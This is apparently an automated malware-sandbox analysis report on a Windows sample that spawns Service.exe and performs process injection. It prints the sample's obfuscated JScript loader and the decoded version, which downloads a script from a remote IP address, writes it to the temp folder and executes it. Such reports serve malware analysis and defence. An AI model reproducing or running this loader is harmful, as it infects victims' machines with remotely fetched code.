                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          Target ID:25
                          Start time:01:38:55
                          Start date:01/10/2024
                          Path:C:\Users\user\AppData\Roaming\Service.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Roaming\Service.exe"
                          Imagebase:0x1a0000
                          File size:59'904 bytes
                          MD5 hash:7284765CA4D2F85C487796F437B01822
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          Target ID:26
                          Start time:01:38:55
                          Start date:01/10/2024
                          Path:C:\Users\user\AppData\Roaming\Service.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Roaming\Service.exe"
                          Imagebase:0xd0000
                          File size:59'904 bytes
                          MD5 hash:7284765CA4D2F85C487796F437B01822
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          Target ID:27
                          Start time:01:38:55
                          Start date:01/10/2024
                          Path:C:\Users\user\AppData\Roaming\Service.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Roaming\Service.exe"
                          Imagebase:0x5b0000
                          File size:59'904 bytes
                          MD5 hash:7284765CA4D2F85C487796F437B01822
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          Target ID:28
                          Start time:01:38:55
                          Start date:01/10/2024
                          Path:C:\Users\user\AppData\Roaming\Service.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Roaming\Service.exe"
                          Imagebase:0x10000
                          File size:59'904 bytes
                          MD5 hash:7284765CA4D2F85C487796F437B01822
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          Target ID:29
                          Start time:01:38:56
                          Start date:01/10/2024
                          Path:C:\Users\user\AppData\Roaming\Service.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Roaming\Service.exe"
                          Imagebase:0xdb0000
                          File size:59'904 bytes
                          MD5 hash:7284765CA4D2F85C487796F437B01822
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          Target ID:30
                          Start time:01:38:56
                          Start date:01/10/2024
                          Path:C:\Users\user\AppData\Roaming\Service.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Roaming\Service.exe"
                          Imagebase:0x400000
                          File size:59'904 bytes
                          MD5 hash:7284765CA4D2F85C487796F437B01822
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          Target ID:33
                          Start time:01:39:54
                          Start date:01/10/2024
                          Path:C:\Windows\System32\wbem\WMIADAP.exe
                          Wow64 process (32bit):false
                          Commandline:wmiadap.exe /F /T /R
                          Imagebase:0x7ff651f50000
                          File size:182'272 bytes
                          MD5 hash:1BFFABBD200C850E6346820E92B915DC
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:moderate
                          Has exited:false

                          Call Graph

                          • Executed
                          • Not Executed
                          [Call graph: entry:C0 -> fromCharCode; entry:C0 -> eval]

                          Script:

                          Code
                          var P8q = 163834344;
                            var VGKGLV = String.fromCharCode ( 163834460 - P8q, 163834458 - P8q, 163834465 - P8q, 163834467 - P8q, 163834354 - P8q, 163834462 - P8q, 163834441 - P8q, 163834458 - P8q, 163834376 - P8q, 163834423 - P8q, 163834442 - P8q, 163834450 - P8q, 163834445 - P8q, 163834443 - P8q, 163834460 - P8q, 163834376 - P8q, 163834405 - P8q, 163834376 - P8q, 163834454 - P8q, 163834445 - P8q, 163834463 - P8q, 163834376 - P8q, 163834409 - P8q, 163834443 - P8q, 163834460 - P8q, 163834449 - P8q, 163834462 - P8q, 163834445 - P8q, 163834432 - P8q, 163834423 - P8q, 163834442 - P8q, 163834450 - P8q, 163834445 - P8q, 163834443 - P8q, 163834460 - P8q, 163834384 - P8q, 163834378 - P8q, 163834421 - P8q, 163834427 - P8q, 163834432 - P8q, 163834421 - P8q, 163834420 - P8q, 163834394 - P8q, 163834390 - P8q, 163834432 - P8q, 163834421 - P8q, 163834420 - P8q, 163834416 - P8q, 163834428 - P8q, 163834428 - P8q, 163834424 - P8q, 163834378 - P8q, 163834385 - P8q, 163834403 - P8q, 163834354 - P8q, 163834423 - P8q, 163834442 - P8q, 163834450 - P8q, 163834445 - P8q, 163834443 - P8q, 163834460 - P8q, 163834390 - P8q, 163834423 - P8q, 163834456 - P8q, 163834445 - P8q, 163834454 - P8q, 163834384 - P8q, 163834378 - P8q, 163834415 - P8q, 163834413 - P8q, 163834428 - P8q, 163834378 - P8q, 163834388 - P8q, 163834376 - P8q, 163834378 - P8q, 163834448 - P8q, 163834460 - P8q, 163834460 - P8q, 163834456 - P8q, 163834402 - P8q, 163834391 - P8q, 163834391 - P8q, 163834393 - P8q, 163834401 - P8q, 163834394 - P8q, 163834390 - P8q, 163834394 - P8q, 163834393 - P8q, 163834392 - P8q, 163834390 - P8q, 163834394 - P8q, 163834393 - P8q, 163834397 - P8q, 163834390 - P8q, 163834393 - P8q, 163834393 - P8q, 163834391 - P8q, 163834466 - P8q, 163834455 - P8q, 163834455 - P8q, 163834453 - P8q, 163834391 - P8q, 163834443 - P8q, 163834443 - P8q, 163834390 - P8q, 163834450 - P8q, 163834459 - P8q, 163834378 - P8q, 163834388 - P8q, 163834376 - P8q, 163834446 - P8q, 163834441 - P8q, 163834452 - P8q, 163834459 - 
P8q, 163834445 - P8q, 163834385 - P8q, 163834403 - P8q, 163834354 - P8q, 163834423 - P8q, 163834442 - P8q, 163834450 - P8q, 163834445 - P8q, 163834443 - P8q, 163834460 - P8q, 163834390 - P8q, 163834427 - P8q, 163834445 - P8q, 163834454 - P8q, 163834444 - P8q, 163834384 - P8q, 163834385 - P8q, 163834403 - P8q, 163834354 - P8q, 163834462 - P8q, 163834441 - P8q, 163834458 - P8q, 163834376 - P8q, 163834446 - P8q, 163834459 - P8q, 163834455 - P8q, 163834376 - P8q, 163834405 - P8q, 163834376 - P8q, 163834454 - P8q, 163834445 - P8q, 163834463 - P8q, 163834376 - P8q, 163834409 - P8q, 163834443 - P8q, 163834460 - P8q, 163834449 - P8q, 163834462 - P8q, 163834445 - P8q, 163834432 - P8q, 163834423 - P8q, 163834442 - P8q, 163834450 - P8q, 163834445 - P8q, 163834443 - P8q, 163834460 - P8q, 163834384 - P8q, 163834378 - P8q, 163834427 - P8q, 163834443 - P8q, 163834458 - P8q, 163834449 - P8q, 163834456 - P8q, 163834460 - P8q, 163834449 - P8q, 163834454 - P8q, 163834447 - P8q, 163834390 - P8q, 163834414 - P8q, 163834449 - P8q, 163834452 - P8q, 163834445 - P8q, 163834427 - P8q, 163834465 - P8q, 163834459 - P8q, 163834460 - P8q, 163834445 - P8q, 163834453 - P8q, 163834423 - P8q, 163834442 - P8q, 163834450 - P8q, 163834445 - P8q, 163834443 - P8q, 163834460 - P8q, 163834378 - P8q, 163834385 - P8q, 163834403 - P8q, 163834354 - P8q, 163834462 - P8q, 163834441 - P8q, 163834458 - P8q, 163834376 - P8q, 163834446 - P8q, 163834449 - P8q, 163834452 - P8q, 163834445 - P8q, 163834456 - P8q, 163834441 - P8q, 163834460 - P8q, 163834448 - P8q, 163834376 - P8q, 163834405 - P8q, 163834376 - P8q, 163834446 - P8q, 163834459 - P8q, 163834455 - P8q, 163834390 - P8q, 163834415 - P8q, 163834445 - P8q, 163834460 - P8q, 163834427 - P8q, 163834456 - P8q, 163834445 - P8q, 163834443 - P8q, 163834449 - P8q, 163834441 - P8q, 163834452 - P8q, 163834414 - P8q, 163834455 - P8q, 163834452 - P8q, 163834444 - P8q, 163834445 - P8q, 163834458 - P8q, 163834384 - P8q, 163834394 - P8q, 163834385 - P8q, 163834376 - P8q, 
163834387 - P8q, 163834376 - P8q, 163834378 - P8q, 163834391 - P8q, 163834423 - P8q, 163834420 - P8q, 163834431 - P8q, 163834418 - P8q, 163834421 - P8q, 163834429 - P8q, 163834390 - P8q, 163834450 - P8q, 163834459 - P8q, 163834378 - P8q, 163834403 - P8q, 163834354 - P8q, 163834449 - P8q, 163834446 - P8q, 163834376 - P8q, 163834384 - P8q, 163834423 - P8q, 163834442 - P8q, 163834450 - P8q, 163834445 - P8q, 163834443 - P8q, 163834460 - P8q, 163834390 - P8q, 163834427 - P8q, 163834460 - P8q, 163834441 - P8q, 163834460 - P8q, 163834461 - P8q, 163834459 - P8q, 163834376 - P8q, 163834405 - P8q, 163834405 - P8q, 163834376 - P8q, 163834394 - P8q, 163834392 - P8q, 163834392 - P8q, 163834385 - P8q, 163834354 - P8q, 163834467 - P8q, 163834354 - P8q, 163834462 - P8q, 163834441 - P8q, 163834458 - P8q, 163834376 - P8q, 163834427 - P8q, 163834460 - P8q, 163834458 - P8q, 163834445 - P8q, 163834441 - P8q, 163834453 - P8q, 163834376 - P8q, 163834405 - P8q, 163834376 - P8q, 163834454 - P8q, 163834445 - P8q, 163834463 - P8q, 163834376 - P8q, 163834409 - P8q, 163834443 - P8q, 163834460 - P8q, 163834449 - P8q, 163834462 - P8q, 163834445 - P8q, 163834432 - P8q, 163834423 - P8q, 163834442 - P8q, 163834450 - P8q, 163834445 - P8q, 163834443 - P8q, 163834460 - P8q, 163834384 - P8q, 163834378 - P8q, 163834409 - P8q, 163834412 - P8q, 163834423 - P8q, 163834412 - P8q, 163834410 - P8q, 163834390 - P8q, 163834427 - P8q, 163834460 - P8q, 163834458 - P8q, 163834445 - P8q, 163834441 - P8q, 163834453 - P8q, 163834378 - P8q, 163834385 - P8q, 163834403 - P8q, 163834354 - P8q, 163834427 - P8q, 163834460 - P8q, 163834458 - P8q, 163834445 - P8q, 163834441 - P8q, 163834453 - P8q, 163834390 - P8q, 163834423 - P8q, 163834456 - P8q, 163834445 - P8q, 163834454 - P8q, 163834384 - P8q, 163834385 - P8q, 163834403 - P8q, 163834354 - P8q, 163834427 - P8q, 163834460 - P8q, 163834458 - P8q, 163834445 - P8q, 163834441 - P8q, 163834453 - P8q, 163834390 - P8q, 163834428 - P8q, 163834465 - P8q, 163834456 - P8q, 163834445 
- P8q, 163834376 - P8q, 163834405 - P8q, 163834376 - P8q, 163834393 - P8q, 163834403 - P8q, 163834354 - P8q, 163834427 - P8q, 163834460 - P8q, 163834458 - P8q, 163834445 - P8q, 163834441 - P8q, 163834453 - P8q, 163834390 - P8q, 163834431 - P8q, 163834458 - P8q, 163834449 - P8q, 163834460 - P8q, 163834445 - P8q, 163834384 - P8q, 163834423 - P8q, 163834442 - P8q, 163834450 - P8q, 163834445 - P8q, 163834443 - P8q, 163834460 - P8q, 163834390 - P8q, 163834426 - P8q, 163834445 - P8q, 163834459 - P8q, 163834456 - P8q, 163834455 - P8q, 163834454 - P8q, 163834459 - P8q, 163834445 - P8q, 163834410 - P8q, 163834455 - P8q, 163834444 - P8q, 163834465 - P8q, 163834385 - P8q, 163834403 - P8q, 163834354 - P8q, 163834427 - P8q, 163834460 - P8q, 163834458 - P8q, 163834445 - P8q, 163834441 - P8q, 163834453 - P8q, 163834390 - P8q, 163834424 - P8q, 163834455 - P8q, 163834459 - P8q, 163834449 - P8q, 163834460 - P8q, 163834449 - P8q, 163834455 - P8q, 163834454 - P8q, 163834376 - P8q, 163834405 - P8q, 163834376 - P8q, 163834392 - P8q, 163834403 - P8q, 163834354 - P8q, 163834427 - P8q, 163834460 - P8q, 163834458 - P8q, 163834445 - P8q, 163834441 - P8q, 163834453 - P8q, 163834390 - P8q, 163834427 - P8q, 163834441 - P8q, 163834462 - P8q, 163834445 - P8q, 163834428 - P8q, 163834455 - P8q, 163834414 - P8q, 163834449 - P8q, 163834452 - P8q, 163834445 - P8q, 163834384 - P8q, 163834446 - P8q, 163834449 - P8q, 163834452 - P8q, 163834445 - P8q, 163834456 - P8q, 163834441 - P8q, 163834460 - P8q, 163834448 - P8q, 163834388 - P8q, 163834376 - P8q, 163834394 - P8q, 163834385 - P8q, 163834403 - P8q, 163834354 - P8q, 163834427 - P8q, 163834460 - P8q, 163834458 - P8q, 163834445 - P8q, 163834441 - P8q, 163834453 - P8q, 163834390 - P8q, 163834411 - P8q, 163834452 - P8q, 163834455 - P8q, 163834459 - P8q, 163834445 - P8q, 163834384 - P8q, 163834385 - P8q, 163834403 - P8q, 163834354 - P8q, 163834462 - P8q, 163834441 - P8q, 163834458 - P8q, 163834376 - P8q, 163834431 - P8q, 163834459 - P8q, 163834448 - P8q, 
163834427 - P8q, 163834448 - P8q, 163834445 - P8q, 163834452 - P8q, 163834452 - P8q, 163834376 - P8q, 163834405 - P8q, 163834376 - P8q, 163834454 - P8q, 163834445 - P8q, 163834463 - P8q, 163834376 - P8q, 163834409 - P8q, 163834443 - P8q, 163834460 - P8q, 163834449 - P8q, 163834462 - P8q, 163834445 - P8q, 163834432 - P8q, 163834423 - P8q, 163834442 - P8q, 163834450 - P8q, 163834445 - P8q, 163834443 - P8q, 163834460 - P8q, 163834384 - P8q, 163834378 - P8q, 163834431 - P8q, 163834427 - P8q, 163834443 - P8q, 163834458 - P8q, 163834449 - P8q, 163834456 - P8q, 163834460 - P8q, 163834390 - P8q, 163834427 - P8q, 163834448 - P8q, 163834445 - P8q, 163834452 - P8q, 163834452 - P8q, 163834378 - P8q, 163834385 - P8q, 163834403 - P8q, 163834354 - P8q, 163834462 - P8q, 163834441 - P8q, 163834458 - P8q, 163834376 - P8q, 163834455 - P8q, 163834426 - P8q, 163834429 - P8q, 163834422 - P8q, 163834376 - P8q, 163834405 - P8q, 163834376 - P8q, 163834431 - P8q, 163834459 - P8q, 163834448 - P8q, 163834427 - P8q, 163834448 - P8q, 163834445 - P8q, 163834452 - P8q, 163834452 - P8q, 163834390 - P8q, 163834426 - P8q, 163834461 - P8q, 163834454 - P8q, 163834384 - P8q, 163834446 - P8q, 163834449 - P8q, 163834452 - P8q, 163834445 - P8q, 163834456 - P8q, 163834441 - P8q, 163834460 - P8q, 163834448 - P8q, 163834385 - P8q, 163834403 - P8q, 163834354 - P8q, 163834469 - P8q, 163834354 - P8q, 163834469 - P8q, 163834354 - P8q, 163834443 - P8q, 163834441 - P8q, 163834460 - P8q, 163834443 - P8q, 163834448 - P8q, 163834384 - P8q, 163834445 - P8q, 163834385 - P8q, 163834467 - P8q, 163834469 - P8q, 163834354 - P8q );
                          eval ( VGKGLV );
                              • eval("try{ var Object = new ActiveXObject("MSXML2.XMLHTTP"); Object.Open("GET", "http://192.210.215.11/zoom/cc.js", false); Object.Send(); var fso = new ActiveXObject("Scripting.FileSystemObject"); var filepath = fso.GetSpecialFolder(2) + "/OLWJMU.js"; if (Object.Status == 200) { var Stream = new ActiveXObject("ADODB.Stream"); Stream.Open(); Stream.Type = 1; Stream.Write(Object.ResponseBody); Stream.Position = 0; Stream.SaveToFile(filepath, 2); Stream.Close(); var WshShell = new ActiveXObject("WScript.Shell"); var oRUN = WshShell.Run(filepath); } } catch(e){} ") ➔ undefined

                                Execution Graph

                                Execution Coverage:18%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:17
                                Total number of Limit Nodes:2
                                execution_graph 2318 2a91ba8 2319 2a91c35 CreateProcessW 2318->2319 2321 2a91d8e 2319->2321 2322 2a92338 ResumeThread 2323 2a923c0 2322->2323 2324 2a921f8 2325 2a92261 2324->2325 2326 2a92276 WriteProcessMemory 2324->2326 2325->2326 2327 2a922d8 2326->2327 2328 2a91ec8 2329 2a91f3b Wow64SetThreadContext 2328->2329 2330 2a91f26 2328->2330 2331 2a91f84 2329->2331 2330->2329 2332 2a91fd8 ReadProcessMemory 2333 2a92097 2332->2333 2334 2a920f0 VirtualAllocEx 2335 2a921a7 2334->2335

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 0 2a90d33-2a90d71 1 2a90d78-2a90f15 0->1 2 2a90d73 0->2 9 2a90f42-2a90f87 call 2a907a4 1->9 10 2a90f17-2a90f41 1->10 2->1 14 2a90f89-2a90fa4 9->14 15 2a90faf-2a91013 9->15 10->9 14->15 21 2a9101a-2a91046 15->21 22 2a91015 15->22 24 2a91048-2a91055 call 2a907b0 21->24 25 2a910a6-2a910d8 call 2a907bc 21->25 22->21 29 2a9105a-2a9107a 24->29 30 2a910da-2a910f5 25->30 31 2a91100 25->31 32 2a9107c-2a91097 29->32 33 2a910a2-2a910a4 29->33 30->31 34 2a91101-2a9110b 31->34 32->33 33->34 36 2a9110d 34->36 37 2a91112-2a91158 call 2a907c8 34->37 36->37 43 2a9115a-2a91175 37->43 44 2a91180-2a91199 37->44 43->44 45 2a9119b-2a911c7 call 2a907d4 44->45 46 2a911f0-2a91259 call 2a907e0 44->46 52 2a911c9-2a911e4 45->52 53 2a911ef 45->53 58 2a9125b-2a9126c 46->58 59 2a9126e-2a91270 46->59 52->53 53->46 61 2a91276-2a9128a 58->61 59->61 62 2a9128c-2a912bd call 2a907e0 61->62 63 2a912be-2a912d5 61->63 62->63 64 2a912fd-2a91332 call 2a907ec 63->64 65 2a912d7-2a912f2 63->65 71 2a9135a-2a9138c 64->71 72 2a91334-2a9134f 64->72 65->64 76 2a914cd-2a914ec 71->76 72->71 77 2a91391-2a9140c 76->77 78 2a914f2-2a91546 call 2a907ec 76->78 90 2a914c2-2a914c7 77->90 91 2a91412-2a91474 call 2a907ec 77->91 85 2a91548-2a91563 78->85 86 2a9156e-2a9159b 78->86 85->86 92 2a9159d-2a915a0 86->92 93 2a915a3-2a915b3 86->93 90->76 105 2a91479-2a91499 91->105 92->93 95 2a915ba-2a915e5 93->95 96 2a915b5 93->96 100 2a91645-2a91677 call 2a90804 95->100 101 2a915e7-2a915f4 call 2a907f8 95->101 96->95 112 2a91679-2a91694 100->112 113 2a9169f 100->113 106 2a915f9-2a91619 101->106 107 2a9149b-2a914b6 105->107 108 2a914c1 105->108 110 2a9161b-2a91636 106->110 111 2a91641-2a91643 106->111 107->108 108->90 110->111 115 2a916a0-2a916a6 call 2a90810 111->115 112->113 113->115 120 2a916ab-2a916cb 115->120 122 2a916cd-2a916e8 120->122 123 2a916f3-2a91785 120->123 122->123
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1507583295.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2a90000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID: (
                                • API String ID: 0-3887548279
                                • Opcode ID: a138e8d0dfc8a2c077492e56e51af94dec5e315be6e41ca041d99fd473eb7f19
                                • Instruction ID: f8523dd101c68062b331df53e20b3111879d3e58e357e8913f4d36456a0df03d
                                • Opcode Fuzzy Hash: a138e8d0dfc8a2c077492e56e51af94dec5e315be6e41ca041d99fd473eb7f19
                                • Instruction Fuzzy Hash: C352AF74E012298FEB68DF66C984BDDB7F2AF89300F5081E9D409AB291DB345E84CF50

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 129 2a91b9c-2a91c33 132 2a91c4a-2a91c58 129->132 133 2a91c35-2a91c47 129->133 134 2a91c5a-2a91c6c 132->134 135 2a91c6f-2a91cab 132->135 133->132 134->135 136 2a91cad-2a91cbc 135->136 137 2a91cbf-2a91d8c CreateProcessW 135->137 136->137 141 2a91d8e-2a91d94 137->141 142 2a91d95-2a91e54 137->142 141->142 152 2a91e8a-2a91e95 142->152 153 2a91e56-2a91e7f 142->153 157 2a91e96 152->157 153->152 157->157
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02A91D79
                                Memory Dump Source
                                • Source File: 00000004.00000002.1507583295.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2a90000_GeUT.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 3dcc1da143d6d94538122c4a82f0dd3fde7ba7b66e316209e497c463db17ad23
                                • Instruction ID: bb8614a5a1d164d16588e57832ea0ad3eaa291e3eb307b109098839867c8a323
                                • Opcode Fuzzy Hash: 3dcc1da143d6d94538122c4a82f0dd3fde7ba7b66e316209e497c463db17ad23
                                • Instruction Fuzzy Hash: 7A81B275D0022ADFDF20DFA9C880BDDBBF5AB49304F1091AAE508B7260DB709A85CF54

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 158 2a91ba8-2a91c33 159 2a91c4a-2a91c58 158->159 160 2a91c35-2a91c47 158->160 161 2a91c5a-2a91c6c 159->161 162 2a91c6f-2a91cab 159->162 160->159 161->162 163 2a91cad-2a91cbc 162->163 164 2a91cbf-2a91d8c CreateProcessW 162->164 163->164 168 2a91d8e-2a91d94 164->168 169 2a91d95-2a91e54 164->169 168->169 179 2a91e8a-2a91e95 169->179 180 2a91e56-2a91e7f 169->180 184 2a91e96 179->184 180->179 184->184
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02A91D79
                                Memory Dump Source
                                • Source File: 00000004.00000002.1507583295.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2a90000_GeUT.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 617f615094b3b6e35bdba68c6da90a32adfc99e6ad2d3ea41f2d72946885c2a1
                                • Instruction ID: 0e180c8ae41a4a8d037dea07a52b51cb41e2a3daf8253b4d32f55e7902fbc463
                                • Opcode Fuzzy Hash: 617f615094b3b6e35bdba68c6da90a32adfc99e6ad2d3ea41f2d72946885c2a1
                                • Instruction Fuzzy Hash: EC81B275D0026ADFDF20DFA9C880BDDBBF5AB49304F1091AAE508B7260DB709A85CF54

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 185 2a921f8-2a9225f 186 2a92261-2a92273 185->186 187 2a92276-2a922d6 WriteProcessMemory 185->187 186->187 188 2a922d8-2a922de 187->188 189 2a922df-2a9231d 187->189 188->189
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02A922C6
                                Memory Dump Source
                                • Source File: 00000004.00000002.1507583295.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2a90000_GeUT.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: 75e37cf0c061d000a733cc65c12958a4e1d4a0adfbcc8908277c42b77ba21ef5
                                • Instruction ID: 0e4473ce50d0e6309d1687e6ed61cc0b37f6657a437fcad29a4c8bf608012974
                                • Opcode Fuzzy Hash: 75e37cf0c061d000a733cc65c12958a4e1d4a0adfbcc8908277c42b77ba21ef5
                                • Instruction Fuzzy Hash: E54168B5D002589FCF10CFAAD984ADEFBF1BB49314F24902AE818B7210D375AA45CF64

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 192 2a921f0-2a9225f 193 2a92261-2a92273 192->193 194 2a92276-2a922d6 WriteProcessMemory 192->194 193->194 195 2a922d8-2a922de 194->195 196 2a922df-2a9231d 194->196 195->196
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02A922C6
                                Memory Dump Source
                                • Source File: 00000004.00000002.1507583295.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2a90000_GeUT.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: 7d77e535a30252a6d2b1e9a4607683f8dc83cae3cb2c0b58e3f962777d0f56f1
                                • Instruction ID: 85379126e2df233b885b4be36585b4a71c66dc3893b22d3b473b3b614a66965c
                                • Opcode Fuzzy Hash: 7d77e535a30252a6d2b1e9a4607683f8dc83cae3cb2c0b58e3f962777d0f56f1
                                • Instruction Fuzzy Hash: B54177B9D002589FCF00CFA9D984A9DFBF1BB49314F24902AE818B7250D734AA45CB64

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 199 2a91fd8-2a92095 ReadProcessMemory 200 2a9209e-2a920dc 199->200 201 2a92097-2a9209d 199->201 201->200
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02A92085
                                Memory Dump Source
                                • Source File: 00000004.00000002.1507583295.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2a90000_GeUT.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: faf96a57f64cab6e116f2270c6eea5a201e01b2ce7514c528447ff2f1549c1bb
                                • Instruction ID: 1cdabe6d8a331b6ecb28a15796fa45f19b3086b2c5fed22c9779b2f7836f90d7
                                • Opcode Fuzzy Hash: faf96a57f64cab6e116f2270c6eea5a201e01b2ce7514c528447ff2f1549c1bb
                                • Instruction Fuzzy Hash: 1F3166B9D042589FCF10CFAAD984ADEFBF5BB19310F14A02AE814B7210D375A945CF64

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 209 2a920e8-2a920eb 210 2a920f0-2a921a5 VirtualAllocEx 209->210 211 2a921ae-2a921e4 210->211 212 2a921a7-2a921ad 210->212 212->211
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02A92195
                                Memory Dump Source
                                • Source File: 00000004.00000002.1507583295.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2a90000_GeUT.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 3d76444f685a52005e15e147764c61566e98d073f3ff9cef9c2b04e33f914b68
                                • Instruction ID: 7df59601f70dcc34270b6f6a02327015df9452600f64c0f83dc842b605a324fa
                                • Opcode Fuzzy Hash: 3d76444f685a52005e15e147764c61566e98d073f3ff9cef9c2b04e33f914b68
                                • Instruction Fuzzy Hash: 843167B9D002589FCF10CFAAD980A9EFBF5BB09310F10902AE914B7310D335A955CF64

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 204 2a91fd0-2a92095 ReadProcessMemory 205 2a9209e-2a920dc 204->205 206 2a92097-2a9209d 204->206 206->205
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02A92085
                                Memory Dump Source
                                • Source File: 00000004.00000002.1507583295.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2a90000_GeUT.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: 9508e57aeea682e8975047f187d65093224b3b2ac859412c2aa3249165fd0b0d
                                • Instruction ID: ef835cad5f992d0612feb8e559798ebb4b71d1bc6711a30864bd7ea99f74500a
                                • Opcode Fuzzy Hash: 9508e57aeea682e8975047f187d65093224b3b2ac859412c2aa3249165fd0b0d
                                • Instruction Fuzzy Hash: 0D3176B9D04258DFCF10CFAAD580ADEFBB1BB19310F14A02AE818B7210C335A945CF64

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 215 2a920f0-2a921a5 VirtualAllocEx 216 2a921ae-2a921e4 215->216 217 2a921a7-2a921ad 215->217 217->216
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02A92195
                                Memory Dump Source
                                • Source File: 00000004.00000002.1507583295.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2a90000_GeUT.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: e6848e1a0cc04bba81e6af9a9da9ae30e3f7c1e25c4fa08cfeba335872659b0e
                                • Instruction ID: aed77d4dc2a71002bee368d3c8b8642cf08c30c1e012281862f921e3a837232f
                                • Opcode Fuzzy Hash: e6848e1a0cc04bba81e6af9a9da9ae30e3f7c1e25c4fa08cfeba335872659b0e
                                • Instruction Fuzzy Hash: BB3156B9D042589FCF10CFAAD984A9EFBF5BB09310F20A02AE914B7310D735A955CF65

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 220 2a91ec3-2a91f24 222 2a91f3b-2a91f82 Wow64SetThreadContext 220->222 223 2a91f26-2a91f38 220->223 224 2a91f8b-2a91fc3 222->224 225 2a91f84-2a91f8a 222->225 223->222 225->224
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 02A91F72
                                Memory Dump Source
                                • Source File: 00000004.00000002.1507583295.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2a90000_GeUT.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
